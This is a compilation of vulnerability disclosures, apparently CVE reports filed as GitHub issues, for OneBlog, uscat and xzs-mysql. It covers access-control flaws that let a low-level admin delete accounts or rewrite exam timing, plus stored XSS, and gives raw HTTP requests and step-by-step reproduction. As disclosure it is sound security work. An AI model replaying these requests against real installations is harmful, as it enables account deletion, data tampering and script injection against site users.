OneBlog <= 2.2.8 is vulnerable to Insecure Permissions. Low level administrators can delete high-level administrators beyond their authority.

\[Suggested description\]  
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).

\[Vulnerability Type\]  
Insecure Permissions

\[Vendor of Product\]  
https://github.com/zhangyd-c/OneBlog

\[Affected Product Code Base\]  
<= 2.2.8

\[Affected Component\]  
POST /user/remove HTTP/1.1  
Host: localhost:8086  
Content-Length: 5  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8086  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8086/users  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms\_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1  
Connection: close

ids= 3（The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value）

\[Attack Type\]  
Remote

\[Vulnerability details\]

first, prepare two test accounts with different levels.  
Senior administrator admin  
![image-20211229164244458](https://user-images.githubusercontent.com/85676107/147647201-cb54a0f2-34fc-4938-9352-7815d636b146.png)  
Low level administrator root123  
![image-20211229164427567](https://user-images.githubusercontent.com/85676107/147647235-bcfc9ef7-e75a-44ed-a219-402b3be9b9e6.png)  
Step 2: log in to the system with root123 and enter the user management page  
![image-20211229165138189](https://user-images.githubusercontent.com/85676107/147647266-38957220-6a81-415c-8828-214ebd5634ea.png)  
Step 3: click the delete button to directly delete the administrator user admin  
![image-20211229165336565](https://user-images.githubusercontent.com/85676107/147647301-53cb95a1-bf48-4548-8cd8-13cf145d418c.png)  
Delete succeeded！

In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)

The first step is to log in to the background with root123 account and enter user management.  
![image-20211229170717287](https://user-images.githubusercontent.com/85676107/147647380-54f14326-4d6f-405e-8bc4-61056c226bc2.png)  
Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test  
![image-20211229171345364](https://user-images.githubusercontent.com/85676107/147647418-1a45d433-45c9-4b78-bc67-e087db3c9f48.png)  
You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.  
![image-20211229171533787](https://user-images.githubusercontent.com/85676107/147647670-1431abf2-b905-421e-a1f7-c683bc3cabd4.png)  
Delete succeeded！

CVE-2021-46085: There is a Insecure Permissions vulnerability exists in OneBlog <= 2.2.8 · Issue #29 · zhangyd-c/OneBlog

uscat, as of 2021-12-28, is vulnerable to Cross Site Scripting (XSS) via "close registration information" input box.

\[Suggested description\]  
Cross SIte Scripting (XSS) vulnerability exists in uscat. via  
a Google search in url:http://localhost:9105/admin/basic.action ,then enter the registration setting page in the background of the system, and enter the malicious XSS code in the "close registration information" input box. The malicious code will be executed at URL: http://localhost:9105/forum/user\_info/register.action , any user who enters this URL will be affected.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/chenniqing/uscat

\[Affected Product Code Base\]  
\*

\[Affected Component\]  
POST /register\_setting/save.json HTTP/1.1  
Host: localhost:9105  
Content-Length: 89  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:9105  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:9105/register\_setting/edit.action  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: JSESSIONID=955307B507B1FD2D9AE8E69C6EABFB75; navUrl=http://localhost:9105/admin/basic.action  
Connection: close

isAllowRegister=1&closeRegisterMessage= your xss payload

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true  
![image-20211229111503824](https://user-images.githubusercontent.com/85676107/147624281-b5f90b03-c234-4455-bfd1-f1bdb68d1a01.png)  
XSS payload will be executed on the registration page at the front of the website. Any user who opens the registration page(url:http://localhost:9105/forum/user\_info/register.action) will be affected  
![image-20211229111731199](https://user-images.githubusercontent.com/85676107/147624340-0d84ef24-c089-4108-aea4-1c1cd8777c8a.png)

CVE-2021-46084: There is a stored xss vulnerability exists in uscat. · Issue #2 · chenniqing/uscat

uscat, as of 2021-12-28, is vulnerable to Cross Site Scripting (XSS) via the input box of the statistical code.

\[Suggested description\]  
Cross SIte Scripting (XSS) vulnerability exists in uscat. via  
a Google search in url:http://localhost:9105/admin/basic.action and enter the site information setting page and enter the malicious XSS code in the input box of the statistical code. This code will be executed in the system foreground

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/chenniqing/uscat

\[Affected Product Code Base\]  
\*

\[Affected Component\]  
POST /web\_info/save.json HTTP/1.1  
Host: localhost:9105  
Content-Length: 213  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:9105  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:9105/web\_info/edit.action  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: JSESSIONID=955307B507B1FD2D9AE8E69C6EABFB75; navUrl=http://localhost:9105/admin/basic.action  
Connection: close

name=Javaex%E8%AE%BA%E5%9D%9B&domain=http%3A%2F%2Fwww.javaex.cn%2F&email=291026192%40qq.com&recordNumber=%E8%8B%8FICP%E5%A4%8718008530%E5%8F%B7&license=1&statisticalCode= your xss payload

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true  
![image](https://user-images.githubusercontent.com/85676107/147621834-ee1be578-47c2-4c39-b8dd-993e73f6f8e2.png)

The input sensitive parameters are not filtered, resulting in malicious code at URL: http://localhost:9105/ After being parsed and executed, all users accessing this URL will be affected.  
![image-20211229103754311](https://user-images.githubusercontent.com/85676107/147622407-2dc34ab7-9951-483c-bf41-add291036e0e.png)

CVE-2021-46083: There is a stored xss vulnerability exists in uscat. · Issue #1 · chenniqing/uscat

xzs-mysql >= t3.4.0 is vulnerable to Insecure Permissions. The front end of this open source system is an online examination system. There is an unsafe vulnerability in the functional method of submitting examination papers. An attacker can use burpuite to modify parameters in the packet to destroy real data.

\[Suggested description\]  
Insecure Permissions vulnerability exists in xzs-mysql.The front end of this open source system is an online examination system. There is an unsafe vulnerability in the functional method of submitting examination papers. An attacker can use burpuite to modify parameters in the packet to destroy real data.  
Post： /api/student/exampaper/answer/answerSubmit

\[Vulnerability Type\]  
Insecure Permissions

\[Vendor of Product\]  
https://github.com/mindskip/xzs-mysql

\[Affected Product Code Base\]  
t3.4.0

\[Affected Component\]  
POST /api/student/exampaper/answer/answerSubmit HTTP/1.1  
Host: localhost:8000  
Content-Length: 135  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/plain, _/_  
X-XSRF-TOKEN: 010353a5-cfe1-4fa8-9a28-0b9cfb4ca538  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
request-ajax: true  
Content-Type: application/json  
Origin: http://localhost:8000  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8000/student/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms\_token=c820882773ab4b6b9719916981b3e9b7; Hm\_lvt\_cd8218cd51f800ed2b73e5751cb3f4f9=1640832435; adminUserName=admin; JSESSIONID=WIBLgnVPP4rhIJU3PzYXxEwTHTA5na4PoZADiRaS; studentUserName=test002; Hm\_lpvt\_cd8218cd51f800ed2b73e5751cb3f4f9=1640835202  
Connection: close

{

​ "questionId":null,

​ "doTime":6,

​ answerItems":\[

​ {

​ "questionId":1,

​ "content":null,

​ "contentArray":\[

​ \],

​ "completed":false,

​ "itemOrder":1

​ }

​ \],

​ "id":1

}

\[Attack Type\]  
Remote

\[Impact Code execution\]  
false

Step 1: open the URL: http://localhost:8000/student/index.html#/paper/index , click "start answer".  
![image-20211230133426683](https://user-images.githubusercontent.com/85676107/147724926-f8b66115-ddfd-4c95-bafe-64cd50352412.png)  
The total exam time is 60 minutes. You can see the remaining time displayed in the upper right.  
![image-20211230133519117](https://user-images.githubusercontent.com/85676107/147724945-a1e31ef3-c8bb-45c2-82ba-31f641323c11.png)  
Step 2: open the burpsuite agent and click the submit button to obtain the packet capture data.  
![image-20211230133804919](https://user-images.githubusercontent.com/85676107/147724967-afff3fbb-061a-4227-b2a9-3374ee794e83.png)  
The value of dotime indicates the number of seconds between the beginning of this test and clicking submit torque, which can be modified to any number.  
![image-20211230134153895](https://user-images.githubusercontent.com/85676107/147724995-d9727b0d-0b96-4c81-b245-3b33f1f1b845.png)

CVE-2021-46086: There is a Insecure Permissions vulnerability exists in XZS · Issue #327 · mindskip/xzs-mysql

SQL injection in Sourcecodester Try My Recipe (Recipe Sharing Website - CMS) 1.0 by oretnom23, allows attackers to execute arbitrary code via the rid parameter to the view_recipe page.

Tag

#apple